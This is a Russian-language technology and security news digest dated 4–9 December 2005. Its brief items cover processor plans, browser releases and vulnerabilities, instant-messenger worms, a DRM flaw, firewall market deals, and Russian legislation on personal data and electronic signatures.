Компания Sun Microsystems может выпустить вторую версию процессора Niagara в 2007 году. Об этом сообщает The Register со ссылкой на документы, содержащие предварительную информацию о спецификациях чипа. Процессор UltraSparc T1 (кодовое название Niagara) был выпущен менее месяца назад. Чип производится по 90-нанометровой технологии и имеет до восьми ядер, каждое из которых выполняет четыре потока инструкций. Таким образом, UltraSparc T1 может оперировать сразу с 32 отдельными потоками. Тактовая частота процессора составляет 1,2 ГГц. Niagara II, как сообщается, будет производиться по 65-нанометровой технологии и также получит восемь ядер. Однако каждое из них сможет обрабатывать уже восемь потоков инструкций, то есть, процессор будет оперировать сразу с 64 потоками. Кроме того, каждое ядро получит блок для выполнения операций с плавающей запятой. Кроме того, упоминаются улучшенные средства безопасности и меньший по сравнению с Niagara I размер. Тактовая частота, нового процессора будет составлять от 1,4 ГГц и выше.
Подробности

9/12/2005 12:50 В интернете появились секретные коды японских аэропортов
Конфиденциальные данные 16 японских аэропортов, включая столичные, а также американского аэропорта на острове Гуам, "утекли" с зараженного вирусом компьютера пилота Japan Airlines (JAL). Об этом заявили официальные лица Японии. Вирус попал в компьютер с программой обмена файлами. Данные, вывешенные в интернете, содержали 3-5 значные коды доступа на территории взлета, запрещенные для прохода посторонних лиц. Представители JAL уведомили пострадашие аэрокомпании об инциденте с целью срочной замены кодов, которые хранил на домашнем компьютере 29-летний пилот Japan Airlines.
Источник

9/12/2005 12:27 Intel создаст чип против шпионского ПО
Компания Intel работает над чипом, который будет предупреждать пользователей об установке руткитов – программ, которые позволяют злоумышленникам получить контроль над компьютером жертвы. Во вторник компания Intel организовала встречу с представителями прессы, аналитиками, студентами и сотрудниками, на которой демонстрировались некоторые ее перспективные проекты и обсуждалось общее видение будущего компьютерной индустрии. По мысли представителей Intel, люди должны будут освободиться от роли преобразователей огромных объемов информации, передаваемой во взаимодействии компьютера и человека. Об этом говорит Дэвид Тенненхаус (David Tennenhouse), вице-президент технологической группы Intel и директор компании по исследованиям. «Компьютеры должны соединяться непосредственно с данными, чтобы людям не приходилось быть каналом ввода/вывода. Роль человека должна быть в большей степени ролью администратора», — уверен г-н Тенненхаус. Однако эти планы Intel вряд ли будут скоро реализованы в ПК. По информации, которой поделился сотрудник исследовательской группы компании Тревис Шлюсслер (Travis Schluessler), ориентировочно этот проект станет частью изделий фирмы в 2008–2009 гг. Другой интересный проект заключается в размещении на материнской плате компьютера небольшого чипа, постоянно следящего за возможными изменениями в коде программ, свидетельствующими об атаке злоумышленников.
Более подробно

9/12/2005 11:19 Устранена уязвимость в DRM-софте MediaMax 5.0 от SunnComm
По инициативе Фонда электронного фронтира EFF специалистами компании iSEC Partners был проведён анализ DRM-софта MediaMax 5.0 компании SunnComm, используемый в дисках Sony BMG. В ходе анализа была выявлена серьёзная ошибка, приводящая к уязвимости ПК под управлением ОС Windows. Злоумышленник имеет возможность модифицировать исполняемый файл MediaMax, который запускается как только пользователь вставляет в привод диск с DRM-защитой. Об уязвимости сразу же сообщили Sony BMG, а публичное разглашение отложили до выпуска необходимого обновления. На проблему в Sony BMG отреагировали быстро и в минувший вторник выпустили заплатку. Однако, EFF замечает, что некоторые важные моменты остались без внимания, а именно соединение с сервером Sony во время запуска дисков, установка почти 18 Мб софта на жёсткий диск и отсутствие деинсталлятора DRM-софта. По данным EFF в продаже находится 20 миллионов дисков с DRM-софтом от SunnComm, из них, как заявляет Sony BMG, лишь 6 миллионов имеют MediaMax 5.0. Список дисков, затрагивающих данную проблему с безопасностью, опубликован на сайте SunnComm.
Об уязвимости

9/12/2005 10:25 На подходе общедоступная бета-версия IE7
В начале будущего года у пользователей Windows XP появится шанс испытать возможности IE7. В ближайшие четыре месяца Microsoft планирует предоставить широкой публике бета-версию Explorer 7 for Windows XP. На этой неделе Дин Хакомович, генеральный менеджер отделения Microsoft Internet Explorer, сообщил в блоге Microsoft, посвященном IE, что к марту 2006 года его команда сделает отредактированную предварительную сборку IE7 for Windows XP общедоступной. «Мы хотим предоставить всем возможность попробовать предварительную версию IE7 и сообщить нам, как она работает с их веб-сайтами, приложениями и дополнительными модулями и вообще, как они работают с Web», — сказал Хакомович. Пока доступ к последнему предварительному релизу есть только у персонала Microsoft и избранных бета-тестеров. Первая бета-версия IE7 вышла в июле. Ожидалось, что в нее войдет ряд изменений, включая усиленную защиту и браузинг во вкладках. Из появившегося позднее постинга в блоге Microsoft стало ясно, что компания меняет принцип управления «зонами безопасности» в Internet Explorer — уровнями защиты, зависящими от предполагаемой степени надежности веб-сайта. Microsoft обеспокоилась тем, что злоумышленники могут нарушить эти зоны, если им удастся обмануть IE, выдав свой сайт за надежный. «Мы поняли, что зона местной интрасети — с ее слабыми ограничениями — совсем не подходит для типичного домашнего пользователя IE. Этим летом один из наших стажеров, Роберт Ляо, изменил логику IE таким образом, что Windows-ПК, не входящий в состав управляемой корпоративной сети, будет рассматривать сайты, кажущиеся интранет-сайтами, как интернет-сайты. Это избавит пользователей домашних ПК от риска атак через зону интрасети», — пишет Microsoft.
Подробности

9/12/2005 10:11 На Xbox 360 подали в американский суд
На компанию Microsoft подал в суд пользователь недавно поступившей в продажу игровой приставки Xbox 360. Житель Чикаго Роберт Байерс (Robert Byers) обвинил производящую приставку корпорацию в том, что его экземпляр изделия регулярно перегревается, в результате чего приставка "виснет" во время игры. По данным BBC News, иск является коллективным и подан от имени одного человека формально. От Microsoft требуют возместить ущерб и судебные издержки, а также заменить все перегревающиеся консоли. В Microsoft заявили, что не комментируют судебные разбирательства в ходе рассмотрения дела. Как ранее сообщалось, уже на следующий день после появления новых приставок в американских магазинах 22 ноября в Интернете появились сообщения о том, что некоторые экземпляры в процессе игры "виснут" и перезапускаются.
Источник

7/12/2005 15:53 В интернете началось "червевещание"
В интернете появился червь, который "разговаривает" с пользователем. IM.Myspace04.AIM распространяется через интернет-пейджер AOL Instant Messenger. Как сообщили специалисты компании ИТ-безопасности IMlogic, червь отправляет пользователю сообщение lol that’s cool ("посмейся, это круто") со ссылкой на файл clarissa17.pif. Если пользователь спрашивает, вирус ли это, червь отвечает lol no its not its a virus ("смешно, нет, это не это вирус"). После того, как файл будет открыт, червь отключает антивирусы и другие защиты, устанавливает себя в систему и начинает рассылку сообщения по списку контактов пользователя. При этом пользователь не видит процесса отправки. "Это первый такой код", - сказал директор по управлению продуктами IMlogic. Червь пока широко не распространен, но сам факт говорит о тестировании новой технологии. "Мы увидим одну или две атаки, а затем червь улучшат и начнется "разгул"", - считает аналитик. Черви для интернет-пейджеров становятся более сложными. Еще один, обнаруженный во вторник компанией Akonix Systems, распространяется как поздравительная открытка. Aimdes.E предлагает перейти по ссылке, чтобы посмотреть рождественскую открытку. При нажатии на ссылку червь устанавливается в систему. В Akonix предупреждают о необходимости проверять даже те сообщения, которые приходят от друзей, потому что это может быть сообщение от вируса.
Источник

7/12/2005 15:14 Эксплоит уязвимости Firefox
Опубликован исходный код (в виде javascript-кода), который использует уязвимость браузера Firefox 1.5. Принцип действия его довольно прост. Как пишет автор, Firefox использует для сохранения всех посещённых URL файл history.dat. Созданный скрипт сохраняет в этом файле очень большой топпик. В результате при следующей загрузке браузера происходит его постоянное зависание из-за переполнения буфера. Для устранения последствий рекомендуется ручное удаления файла history.dat.
Исходник и описание

7/12/2005 14:11 Встроенная в Microsoft Windows российская криптография получила одобрение ФСБ
Операционные системы корпорации Microsoft Windows XP Professional SP2 и Windows Server 2003 SP1 с интегрированной российской криптографией получили одобрение Федеральной службы безопасности (ФСБ) Российской Федерации. Об этом говорится в документе, полученном корреспондентом "Ленты.Ру" от представителей Microsoft на открывшейся в среду в Москве в Академии наук седьмой ежегодной конференции "Платформа-2006. Определяя будущее". В документе сообщается, что по итогам сотрудничества государственного предприятия ФСБ "Научно-технический центр "Атлас" и Microsoft были получены положительные заключения экспертов ФСБ, удостоверяющие, что названные продукты корпорации в части криптографических модулей "удовлетворяют уровню КС2 в соответствии с "Требованиями к средствам криптографической защиты конфиденциальной информации", а сами продукты удовлетворяют уровню АК2 в соответствии с "Требованиями по защите конфиденциальной информации от несанкционированного доступа в автоматизированных информационных системах, расположенных на территории Российской Федерации".
Подробнее

7/12/2005 13:30 Рынок межсетевых экранов активно меняется
Производитель антишпионского программного обеспечения Sunbelt Software объявил о своем намерении приобрести компанию Kerio, занимающуюся разработкой защитных межсетевых экранов, сообщает сайт The Register. Сделка, условия которой не разглашаются, должна завершиться до конца декабря. Продукт Kerio Personal Firewall получит новое название — Sunbelt Kerio Personal Firewall. Sunbelt Software планирует продавать новый продукт по сниженной цене в рамках промо-акции. Новый владелец межсетевого экрана пообещал сохранить традицию прежнего разработчика и оставить базовую версию программы бесплатной для домашних пользователей. Ранее компания Kerio заявляла о своих планах прекратить работу с персональным межсетевым экраном в конце декабря текущего года. Разработчики намеревались сосредоточиться на продуктах Kerio MailServer и Kerio WinRoute Firewall для малого бизнеса. Таким образом, Sunbelt спас популярный продукт от забвения, отмечает The Register. Программа Kerio Personal Firewall была создана в 2002 году. С того времени ее скачали 2 миллиона пользователей. Рынок межсетевых экранов претерпел изменения и в других областях. Компания Symantec отказалась от межсетевого экрана Sygate и удалила его из числа своих разработок из-за значительного пересечения с проектом Norton Personal Firewall. Конкурет Symantec Check Point намеревается увеличить свою долю на рынке благодаря стратегии аггрессивных продаж. Подразделение Check Point Zone Labs в настоящее время продает пользователям ZoneAlarm Pro межсетевые экраны Sygate Kerio с 40-процентной скидкой от обычной цены в 49,95 доллара.
http://www.viruslist.com

7/12/2005 12:56 Хит-парад компьютерных неприятностей 2005 года
Компания Ontrack Data Recovery, специализирующаяся на восстановлении информации, записанной на цифровые носители, опубликовала список десяти самых нелепых случаев, приведших к потере данных пользователями компьютеров. Первое место хит-парада занимает мужчина, попытавшийся вернуть файлы, хранящиеся на старом ноутбуке. Компьютер провалялся в сарае около десяти лет, а внутри его корпуса инженеры обнаружили останки десятков тараканов. Вторую строку занимает владелец ПК, в порыве гнева не раз приложившийся к устройству молотком. На корпусе компьютера остались сильные вмятины. Бейсбольная команда Minnesota Twins, замыкающая тройку лидеров, умудрилась потерять сразу всю информацию о своих планах и результатах. На четвертое место попала компания, попытавшаяся восстановить данные с RAID-массива, в составе которого отсутствовал один винчестер. Оказалось, что этот жёсткий диск случайно попал в утиль и, по внутренним правилам фирмы, в нем была просверлена дырка. Пятую позицию занимает часовой мастер, потерявший все свои разработки прямо перед важным международным шоу. К счастью, информацию удалось восстановить. Вслед за часовщиком идет "умелец", попытавшийся самостоятельно извлечь данные из своего компьютера. Мужчина разобрал винчестер и, так и не сумев восстановить файлы, отправил все детали в компанию Ontrack Data Recovery в отдельных пакетиках.
Хит-парад

7/12/2005 12:43 В Windows Vista количество перезагрузок сведено к минимуму
В Windows Vista будет включён компонент Restart Manager, который позволит устанавливать приложения и обновлять систему без перезагрузки машины. До недавнего времени в Microsoft предпочитали не распространятся относительно этого компонента. По словам Джима Алкина, вице-президента подразделения Microsoft по продуктам и сервисам, Windows Installer теперь будет запускать Restart Manager, который, в свою очередь, определит используется ли в данный момент обновляемый компонент системы. Если компонент свободен, то происходит установка обновления без перезагрузки, а после обновления запущенной программы автоматически произойдёт её перезапуск. Доступная информация о Restart Manager находится на сайте MSDN Windows Vista Developer Center. По словам разработчиков, компонент Restart Manager будет работает с Microsoft Update, Windows Update, Microsoft Windows Server Update Services, Microsoft Software Installer и Microsoft Systems Management Server. Компонент Restart Manager не избавит пользователя от перезагрузок полностью, но, как уверяют в Microsoft, "сократит их число до минимума".
Более подробно

7/12/2005 11:30 Россия: за кражу личных данных будут сажать
«Закон о персональных данных», который находится на рассмотрении в Госдуме, предполагает создание независимого органа власти по защите персональных данных, а также предусматривает ответственность вплоть до уголовной и вводит широкий спектр других защитных механизмов. Законопроект должен пройти второе чтение в декабре и может быть принят в 2006 г. В случае утечки персональных данных разработчики законопроекта предлагают предусмотреть ответственность вплоть до уголовной. «При доработке законопроекта мы считаем, что именно в таком ключе его доработка должна вестись», — подчеркнул замглавы Мининформсвязи. Напомним, что в настоящее время предусмотрена административная форма ответственности за подобные правонарушения. Более того, законопроект вводит ответственность оператора базы данных и персональную ответственность тех лиц, которые в органах государственной власти или в коммерческих организациях отвечают за сохранность сведений о частной жизни граждан.
Более подробно

7/12/2005 10:58 Sophos: Гейтс не сдержит обещание побороть спам
Предсказание Билла Гейтса об искоренении спама, сделанное в 2004 году, едва ли сбудется в обещанный срок к 2006 году, предупредила аналитическая фирма. В январе 2004 года Билл Гейтс прогнозировал, что через два года спам «останется в прошлом», но этому пророчеству вряд ли суждено сбыться, заявила на этой неделе секьюрити-комапния Sophos. Во вторник она предупредила, что и в 2006 году проблема спама останется самой насущной. «Sophos убеждена, что слухи о кончине спама были очень сильно преувеличены. Угроза по-прежнему жива и здравствует, несмотря на усиление борьбы против спамеров и постоянное совершенствование соответствующего ПО», — говорится в годовом отчете Sophos Security Threat Management. «Конца спаму не видно», — с прискорбием констатирует компания. В 2005 году спам в сообщениях электронной почты составлял серьезную проблему, причем быстрее всего рос объем спама, относящегося к биржевой мошеннической схеме pump-and-dump (накачка и сброс). «Мошеннические биржевые схемы pump-and-dump — одно из быстро развивающихся направлений деятельности спамеров. Плохие парни покупают дешевые акции компании, а затем распространяют о ней хорошую новость — например, что эта компания разработала некое чудесное лекарство. Спекулянты принимают это за чистую монету и начинают скупать акции. Как только их цена повышается, спамеры быстро продают свои акции», — пояснил старший консультант Sophos Грэм Клули. К ноябрю 2005 года 13,5% всего спама, зафиксированного Sophos, имели отношение к акциям, что на 12,7% больше, чем в начале года (0,8%). «Это очень эффективный способ делать деньги», — добавил Клули.
Подробнее

7/12/2005 10:24 Южная Корея оштрафовала Microsoft на 32 миллиона долларов
Антимонопольный регулятор Южной Кореи приговорил компанию Microsoft к выплате штрафа в размере 32 миллионов долларов и предписал компании продавать на корейском рынке версии операционной системы Windows без встроенных медиа-плеера и интернет-пейджера. Этот вердикт повторяет определение, вынесенное в Евросоюзе в 2004 году, сообщает Bloomberg. Тогда европейская антимонопольная служба приговорила Microsoft к штрафу в 584 миллиона долларов и предписала компании продавать свою операционную систему без встроенных приложений. Аналитики отмечают, что, несмотря на то, что на корейский рынок приходится менее одного процента продаж Microsoft, случай может стать прецедентным - вслед за Кореей Microsoft имеет шанс получить аналогичные иски на многих других небольших рынках.
Подробности

6/12/2005 13:07 "Иммунизация" интернета: новый способ борьбы с вирусами
Обычное антивирусное ПО использует для поиска и обезвреживания вирусов их сигнатуры. Это означает, что как правило, вирусы должны быть исследованы специалистами до того как антивирусное ПО научится их различать, что снижает скорость "ответной реакции", и может привести к тому, что некоторые быстрораспространяющиеся вирусы нанесут немалый ущерб, до того как будут обезврежены. Решением проблемы могут стать, так называемые "иммунные системы". Новый вид таких систем разработала команда из Тель-Авивского университета под руководством Эрана Шира (Eran Shir). Они применили теорию сетей к решению проблемы, и, как утверждают, нашли более эффективные способы борьбы с вирусными атаками. Исследователи считают, что атаки вирусов всегда будут опережать ответные действия, исходящие от серверов, контролирующих сеть. Поэтому предлагают развить распределенную в интернете сеть компьютеров-"ловушек" (honeypots). Эти компьютеры будут "заманивать" вирусы, автоматически их анализировать и распространять контрмеры. "Ловушки" должны быть связаны между собой отдельными защищенными каналами. В этом случае, при обнаружении атаки на одной из "ловушек" остальные будут моментально оповещены, и начнут работать как центры распространения обезвреживающего кода. Моделирование показало что, чем больше сеть, тем более эффективно работает эта схема. Например, если в сети будет 50 тыс. узлов (компьютеров), и только 0,4 % из них "ловушки", вирусы успеют захватить не более 5% сети, а затем будут остановлены "иммунной системой". Для сети с 200 млн. узлов, при той же пропорции "ловушек" заражение составит всего 0,001 %. Пока подобная "иммунная система" существует лишь в теории, но Шир надеется с помощью добровольцев запустить подобный проект в интернете.
CNews

6/12/2005 12:02 Вышла обновлённая бета-версия файловой системы WinFS
Подписчикам сети Microsoft Developer Network (MSDN) стала доступна обновлённая модификация новой файловой системы под названием Windows File System (или WinFS). Первая бета-версия WinFS появилась в конце августа нынешнего года. С помощью WinFS в Microsoft хотят реализовать универсальный подход к хранению, поиску и извлечению данных. При этом поддержка NTFS позволит сохранить совместимость со старыми приложениями и вычислительными системами, технологии SQL Server послужат для хранения информации в более упорядоченном виде, а посредством XML к файлам можно будет добавлять метаданные. В целом, WinFS должна обеспечить гибкие возможности по структурированному представлению и синхронизации информации между различными устройствами. Доступная подписчикам MSDN версия Windows File System работает с операционными системами Windows ХР Professional или Home. В новой модификации WinFS Beta 1, выпущенной на днях, появилась поддержка .Net Framework 2.0 и Visual Studio 2005.
Более подробно

6/12/2005 11:46 Червь Sober стал причиной нарушений в работе почтовых сервисов Microsoft
В минувшую пятницу в Microsoft объявили, что некоторые подписчики её почтовых сервисов Hotmail и MSN в течение некоторого времени не имеют возможности получать электронную корреспонденцию от клиентов компании Comcast и пользователей услуг ряда других интернет-провайдеров. По словам Брук Ричардсон, менеджера по продуктам онлайнового подразделения Microsoft MSN, трудности с доставкой почты вызваны значительным увеличением объемов корреспонденции, в котором частично виновен компьютерный вирус Sober, заражения модификацией которого (Sober-Z), по данным антивирусной компании Sophos, составили в прошлом месяце 85 процентов от общего числа сообщений об инфицировании. Ричардсон сообщила, что ввиду большого числа обрабатываемых сообщений, доставка некоторых писем может задерживаться. Представитель MSN не назвала имена других интернет-провайдеров, которые также испытывают трудности с доставкой писем, и отметила, что сроки решения проблемы пока не известны, подчеркнув, что о задержке в доставке в компании знали еще в начале прошлой недели. Некоторые клиенты Comcast отмечают в своих блогах, что, после отправления писем адресатам, пользующимся сервисами Hotmail или MSN, получили сообщение об ошибке, говорящее, что корреспонденция не была получена адресатом. Однако в Microsoft уверяют, что письма не потеряны безвозвратно и, как только проблема будет устранена, будут доставлены по назначению. Представитель Comcast Дженнифер Куори поспешила заверить общественность, что письма клиентов компании не доходят только на адреса пользователей MSN и Hotmail. С отправкой на адреса пользователей других почтовых сервисов все в порядке. В настоящее время обе компании активно работают над решением проблемы.
Подробности

6/12/2005 11:19 RealNetworks переводит Rhapsody в Web
С понедельника основная служба музыкальной подписки RealNetworks переходит в Web. Отчасти это первые плоды недавнего урегулирования антимонопольного спора с Microsoft. Компания создает новую версию своей цифровой музыкальной службы Rhapsody, которая позволит искать и прослушивать песни из каталога прямо на веб-странице, вместо того чтобы загружать их в специальную программу. После выхода новой версии компания Microsoft в течение нескольких недель будет продвигать Rhapsody через свой Media Player и веб-сайт MSN Music. Руководство RealNetworks надеется, что новая версия в сочетании с предыдущим предложением, позволяющим прослушивать до 25 песен бесплатно, облегчит веб-серферам ознакомление с музыкальной службой по подписке. «Пока не загрузишь программу, не знаешь, что она тебе даст, — говорит старший вице-президент по потребительским службам RealNetworks Дэн Шихан. — Здесь та же проблема, с которой сталкивается TiVo: пока не попробуешь, не поймешь». Шаг RealNetworks — часть более широкой тенденции по переводу музыкальных служб в веб. Взамен того, чтобы предлагать загружаемое ПО, как это делает большинство музыкальных магазинов. Упрощая поиск своих продуктов и предлагая их через веб-браузер, компании надеются достучаться до аудитории, которая отказывалась платить за цифровую музыку. Так, America Online, недавно купившая MusicNow, отделение Circuit City, разрабатывает новый план подписки на базе Web. Napster тоже недавно сообщил о намерении предложить больше музыки на своем веб-сайте.
Подробности

6/12/2005 10:44 Хакеры хотели навредить выборам в Мосгордуму
В ходе проходивших в воскресенье выборов в Московскую городскую думу было зафиксировано несколько атак хакеров на сайт Центральной избирательной комиссии (ЦИК). Об этом, как передает РИА Новости, сообщил в понедельник глава ЦИК РФ Александр Вешняков. "Атаки хакеров были, но не столь интенсивные, сколь на федеральных выборах, опасности они не представляли", - сказал Вешняков на пресс-конференции в Москве. Кроме того, по его словам, было зафиксировано несколько попыток заражения автоматизированной системы подсчета голосов ГАС "Выборы" вирусами. Однако эти попытки были нейтрализованы - по словам Вешнякова, от подобных актов саботажа позволяют защитить "меры безопасности, которые действуют в нашей информационной системе". "Никаких осложнений для работы такого рода явления не оказали", - приводит РИА слова Вешнякова.
РИА "Новости"

5/12/2005 13:17 Microsoft все же придется переделать Internet Explorer
Корпорации Microsoft все же придется внести ряд изменений в свой браузер Internet Explorer, что позволят отказаться от применения технологий, защищенных патентом Eolas. Патент Eolas, о котором идет речь, был выдан в конце 1998 года Калифорнийскому университету и описывает методику доступа пользователя к интерактивным программам, внедренным в веб-страницы. Причем патент предполагает чрезвычайно широкую трактовку, и под определение "интерактивные программы" попадают апплеты Java, ролики Macromedia Flash, различные модули ActiveX и другие подобные решения. Таким образом, патент в той или иной мере нарушают фактически все современные браузеры. Для получения прибыли от технологии, разработанной в Калифорнийском университете, была создана фирма Eolas, первой "жертвой" которой стала корпорация Microsoft. Летом 2003 года суд обязал Microsoft выплатить Eolas компенсацию в размере 520 миллионов долларов, а поданная на данное решение апелляция была отклонена Верховным судом США без объяснения причин. Как теперь сообщает PC World со ссылкой на заявления представителя Microsoft Джека Эванса, с января следующего года корпорация планирует начать распространение патчей, которые позволят решить проблему нарушения авторских прав Eolas браузером IE. Модифицированная версия Internet Explorer также войдет в состав дистрибутива операционной системы Windows ХР, кроме того, изменения будут внесены в браузер IE седьмой версии.
Подробности

5/12/2005 12:15 Качество VoIP вызывает все больше претензий
Хотя качество VoIP несравненно улучшилось за последние годы, но именно сейчас оно вызывает, пожалуй, больше критики, чем когда бы то ни было. И это вполне логично. В западных странах крупнейшие провайдеры широкополосного доступа в интернет, кабельные провайдеры и телефонные компании — все предлагают своим клиентам услугу голосовой связи VoIP. Это позволяет сэкономить десятки, а то и сотни долларов в месяц на телефонных разговорах. Но есть и обратная сторона медали — качество связи, пишет BusinessWeek. Клиенты предъявляют претензии. Избалованные сверхдорогой, но относительно качественной телефонной связью прошлого, пользователи VoIP не всегда понимают, что освоение новой технологии требует жертв. Только появившись, технология VoIP стала использоваться буквально повсеместно. По статистике аналитической компании Empirix, в Америке 52% коммерческих компаний и около 3 млн частных лиц звонят через интернет, причем число пользователей очень быстро увеличивается — более чем удваивается каждый год. По мере того, как к сервису подключаются все новые клиенты, растет и количество претензий. Клиенты подключаются, желая сэкономить — и сталкиваются с тем, что качество связи не такое высокое, как в обычных телефонах. По статистике все той же фирмы Empirix, у коммерческих VoIP-провайдеров ежемесячный отток новых клиентов составляет около 25%. То есть из четырех новых пользователей только трое продолжают использовать эту услугу в следующем месяце. Это происходит именно по причине плохого качества связи.
Более подробно

5/12/2005 11:29 Появилась тестовая версия Skype 2 Beta
Появилась бета-версия Skype 2. Основным нововведением во второй версии Skype можно считать появление видеосвязи. Обладая веб-камерами, пользователи могут устраивать видеосвязь по сети.
У программы был переработан дизайн интерфейса различных окон. Добавлены возможности, упрощающие работу. В Skype 2 появились новые звуковые события. Для удобства использования, контакты теперь можно группировать и фильтровать по каким-либо признакам. Полезная опция для людей с большим контакт-листом. Разработчики предупреждают о наличии небольшой недоработки в Skype 2 Beta. При звонках из Skype на обычные телефонные номера (используя SkypeOut) в случае если номер абонента занят, то чаще возникает сообщение "call failed", хотя по идее должно быть "busy". Страшного в этом ничего нет, просто это создает небольшую путаницу. Ошибку должны вскоре исправить.
Дистрибутив (8.5 МБ)

5/12/2005 11:25 Internet Explorer: новый способ обворовать пользователя
Израильский хакер обнаружил уязвимость в браузере Microsoft Internet Explorer, которая позволяет злоумышленникам получать доступ к жестким дискам пользователей, у которых установлен Google Desktop. В результате неправильной обработки веб-страниц сайт с вредоносным кодом может выкрадывать важную информацию, такую, как номера кредитных карточек и пароли. «Совершенно не защищены те пользователи IE, у которых установлен Google Desktop, — говорит хакер Матан Гиллон (Matan Gillon) в электронном интервью. — Опытный хакер может незаметно сканировать жесткие диски жертвы в поисках такой важной информации, как пароли и номера кредиток. Так как Google индексирует электронные письма, прочитываемые в веб-интерфейсе, к ним тоже можно получить доступ в ходе атаки». Г-н Гиллон подробно описал принцип осуществления атаки и представил пример эксплойта в своем блоге. По его словам, баг в IE связан с тем, как браузер обрабатывает информацию о форматировании страницы, получаемую в формате CSS (каскадные таблицы стилей). Формат CSS широко используется для придания веб-сайтам единообразного внешнего вида и унификации способа работы с ними, однако недостатки обработки CSS в IE позволяют преступникам с помощью Google Desktop красть конфиденциальную информацию. Для проведения атаки сперва необходимо завлечь жертву на вредоносный веб-сайт, пишет г-н Гиллон. Успешно атакуются IE 6 в сочетании с Google Desktop версии 2, а также иные версии браузера Microsoft. Браузеры других производителей, такие, как Firefox и Opera, к атаке не восприимчивы. Г-н Гиллон пишет, что атаку можно предотвратить, отключив обработку JavaScript, который является одним из самых популярных скриптовых языков.
Источник

5/12/2005 10:52 Новые возможности mod_security
Ivan Ristic, автор книги "Apache Security" и разработчик Apache модуля mod_security, написал статью с описанием новшеств появившихся в новой версии ModSecurity 1.9, сообщает opennet.ru. По сравнению с прошлой стабильной версии модуля число функций удвоилось, а объем исходного кода возрос на 40%. Среди нововведений - наследование правил, переписанная система ведения лога событий, новые средства защиты от DoS-атак через контроль сессий, возможность интеграции с антивирусным пакетом ClamAV для проверки закачиваемых данных и т.д.
Статья

5/12/2005 10:39 Хакера "доктора Хаоса" посадили на семь лет
Человек, называвший себя в Сети "доктор Хаос", в среду был приговорен к семи годам лишения свободы в федеральной тюрьме. Он обвиняется во взломе компьютеров и сбоях электричества на северо-востоке графства Висконсин. Джозеф Конопка уже отсидел 13 лет, после того, как в 2002 году признал себя виновным в хранении химического оружия - он спрятал цианид в районе одной из станций чикагской подземки. Конопка, бывший системный администратор, признался в 11 преступлениях, в числе которых сговор, умышленный поджог, создание контрафактных копий софта и вмешательства в компьютерные системы Висконсина. По заявлению прокуроров, Конопка-Chaos и сего соучастник Realm виновны в 28 авариях в системе энергоснабжения, в результате которых пострадали 30 тысяч человек, и других 20 сбоях связи из-за технических проблем. Общий нанесеннной парочкой ущерб оценили в 800 тысяч долларов. В 2002 втором году под обвинение попали 6 подростков - сообщников Конопки. Помимо отсидки, ему предстоит заплатить штраф в качестве компенсации в размере 436 тысяч долларов, а также в течение трёх лет после освобождения хакер будет находиться под наблюдением правоохранительных органов
Подробности

5/12/2005 10:08 IDC пророчит на 2006 год перестройку IT-сектора
Аналитики убеждены, что в преддверии нового года технологическим компаниям следует провести «проверку на вшивость» и брать пример с Google и сообщества открытого ПО. В 2006 году можно рассчитывать лишь на умеренные темпы роста инвестиций в ИТ, что вынудит многих поставщиков предпринять решительные шаги и разработать новые бизнес-модели. Таково мнение аналитической фирмы IDC, которая в четверг опубликовала прогноз на будущий год. IDC предсказывает, что в 2006 году инвестиции в ИТ во всем мире вырастут на 5,5%. Учитывая 6%-ый рост в 2005 году, это означает, что еще больше технологических компаний будут вынуждены перейти к предложению ИТ как услуг, считает старший вице-президент IDC по исследованиям Фрэнк Дженс. «Принципиально новым явлением, которое мы увидим [в 2006 году], станет ускоренное освоение радикальных бизнес-моделей: «открытые инновации» в области разработки ИТ-продуктов и услуг (эффект открытого ПО) и онлайновая доставка ИТ как услуг (эффект Google), — говорится в заявлении Дженса. — Такая перестройка вынудит большинство поставщиков перед началом нового года произвести стратегическую проверку на вшивость». Эффект Google, о котором говорит Дженс, вызван опасением того, что поисковый гигант в ближайшие годы подомнет под себя еще больше рынков. «Хотя на многие из этих перемен уйдут годы, и в 2006 году будет больше разговоров, чем дела, все более серьезное влияние «Google как нарушителя спокойствия» подтолкнет традиционных поставщиков к тому, чтобы реформироваться раньше конкурентов. Это наглядно проявится в сфере корпоративных приложений, управления информацией и ИТ-услуг», — пишет IDC.
Источник

4/12/2005 12:13 Файрвольные новости: Sygate out, Kerio back
Плохая новость для пользователей Sygate Personal Firewall : через месяц после окончательного приобретения Sygate Technologies случился вполне предсказуемый шаг - Symantec объявила о прекращении выпуска этой линейки, подсластив пилюлю обещанием специальной цены в случае апгрейда с Sygate на продукты семейства Norton. Хорошая новость для пользователей Kerio Personal Firewall, огорченных чуть ранее известием о прекращении его выпуска по причине возросшей конкуренции и невозможности дополнить его самостоятельными антивирусными решениями. Sunbelt Software, известная своим антиспайверным продуктом CounterSpy, объявила в четверг о планируемой покупке KPF у Kerio. Приобретение будет завершено к концу месяц, первое время продукт будет выходить под именем Sunbelt Kerio Personal Firewall. Обещается поддержка текущих пользователей, сохранение политики предоставления домашним пользователям бесплатной облегченной версии и снижение цены на полный пакет после завершения сделки. Предполагается развитие и до корпоративной версии.
Источник

4/12/2005 11:35 Домен .CO.UA начал свою жизнь
Первого декабря началась официальная регистрация имен в новой доменной зоне .co.ua. Прием предварительных заявок регистраторы домена начали еще в сентябре. На дату начала регистрации, 1 декабря 2005 года поступило 956 предварительных заявок на регистрацию доменных имен зоне .co.ua. Все они были обработаны, в результате чего было зарегистрировано 696 доменных имен и отказано в регистрации 260 заявкам по причине того, ранее поступила аналогичная заявка на регистрацию такого же доменного имени. От регистраторов продолжают поступать заявки на регистрацию доменных имен в зоне .co.ua, и по состоянию на 15:30 1 декабря в домене насчитывается уже насчитывалось более 750 доменных имен. Регистраторами доменной зоны .co.ua являются 15 организаций. Стоимость регистрации домена .co.ua у официальных регистраторов колеблется от 48 до 63 гривен в год (около 11 долларов США).
Источник

4/12/2005 10:51 Электронная подпись должна заработать в 2006
На проходившей 1 декабря в Москве конференции "CIO. Госсектор" заместитель главы Мининформсвязи РФ Дмитрий Милованцев отметил, что новый законопроект "Об электронной подписи" уже внесён в план законотворческой деятельности правительства и будет рассмотрен в конце текущего - начале следующего года. Одобрение проекта Думой ожидается в 2006. "Необходимость рассмотрения нового законопроекта обусловлена тем, что существующий закон 'Об электронной цифровой подписи' фактически не работает, – цитирует РИА "Новости" слова чиновника. - Правовое признание электронной подписи на данный момент отсутствует, что приводит к дискриминации электронного документооборота по отношению к бумажному". Принятие грамотного закона позволило бы значительно облегчить удаленное оформление сделок, что, по мнению многих экспертов, могло бы способствовать существенному росту объемов электронной торговли – в особенности, в секторе B2B.
РИА "Новости"

